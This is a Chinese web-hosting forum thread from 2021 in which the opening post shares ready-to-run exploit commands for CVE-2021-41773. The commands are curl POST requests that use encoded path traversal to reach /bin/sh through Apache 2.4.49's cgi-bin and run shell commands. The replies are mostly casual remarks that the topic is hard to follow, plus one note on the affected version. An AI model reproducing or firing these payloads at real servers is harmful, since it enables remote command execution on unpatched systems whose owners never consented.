全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 1674|回复: 14

[疑问] 新漏洞

[复制链接]
发表于 2021-10-6 17:03:57 来自手机 | 显示全部楼层 |阅读模式
CVE-2021-41773升级为无码版命令执行[惊恐]

exp:
curl --data "A=|id>>/tmp/x;uname\$IFS-a>>/tmp/x" 'http ://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv

curl --data "A=|id>/tmp/x" 'http ://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv
发表于 2021-10-6 18:12:48 | 显示全部楼层
此问题仅影响 Apache 2.4.49 而不是早期版本。
发表于 2021-10-6 17:05:45 | 显示全部楼层
还行                    
发表于 2021-10-6 17:06:26 | 显示全部楼层
本帖最后由 acpp 于 2021-10-6 17:11 编辑

v2.4.49 就这版本的目录穿越吧
发表于 2021-10-6 17:07:31 | 显示全部楼层
看不懂就不参与了
发表于 2021-10-6 17:10:05 | 显示全部楼层
Apache?不用这个...
发表于 2021-10-6 17:11:07 | 显示全部楼层
看不懂 说点听的懂得
发表于 2021-10-6 17:16:26 | 显示全部楼层
看不懂
zsbd
发表于 2021-10-6 17:19:55 | 显示全部楼层
我还以为甲骨文又出啥漏洞了
发表于 2021-10-6 17:21:39 | 显示全部楼层


https://www.secrss.com/articles/34890

我用NGINX
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2024-4-26 00:59 , Processed in 0.063634 second(s), 9 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表